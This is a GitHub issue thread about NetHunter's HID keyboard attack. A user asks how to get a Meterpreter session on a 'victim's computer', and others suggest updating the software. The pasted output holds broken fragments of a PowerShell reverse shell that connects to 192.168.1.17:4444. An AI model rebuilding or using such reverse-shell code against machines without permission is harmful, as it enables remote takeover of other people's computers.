### ISSUE TITLE
HID help explain

### ISSUE THREAD

**Issue by ShaharLahav** [offensive-security/nethunter-app#123]
Hi, I am very sorry for the silly question:
Can you explain me how the HID works? i mean, what should I do in order to use the meterpreter in my kali linux to control the victim's computer ?
I've tried to just execute the powersploit attack with the configured port and host, but nothing happens, I mean the cmd shows a lot of 'unrecognized' as in wrong commands...
I haven't put anything in the URL (i dont know what to put there) 
Again, sorry for the question, I'll understand if you laugh at me...

**Comment by ShaharLahav** [comment]
Actually this is what I get : 

```
C:\WINDOWS\system32>unction cleanup {
'unction' is not recognized as an internal or external command,
operable program or batch file.

C:\WINDOWS\system32>if ($client.Connected -eq $true) {$client.Close()} ;if ($pro
cess.ExitCode -ne $null) {$process.Close()};exit}
-eq was unexpected at this time.

C:\WINDOWS\system32>$address = '192.168.1.17'
'$address' is not recognized as an internal or external command,
operable program or batch file.

C:\WINDOWS\system32>$port = '4444'
'$port' is not recognized as an internal or external command,
operable program or batch file.

C:\WINDOWS\system32>$client = New-Object system.net.sockets.tcpclient
'$client' is not recognized as an internal or external command,
operable program or batch file.

```

**Comment by simonpunk** [comment]
Please update to the latest version. This happened to me long time ago when I used the old version. 
So I can just tell you that this is caused by executing the wrong script in nethunter.

**Comment by ShaharLahav** [comment]
I have the 3.0.5 version

**Comment by zuthroxius** [comment]
same problem here, on oneplus1

**Comment by zuthroxius** [comment]
If you run apt-get upgrade && apt-get update on a kali terminal it will update the nethunter utils and fix the isssue
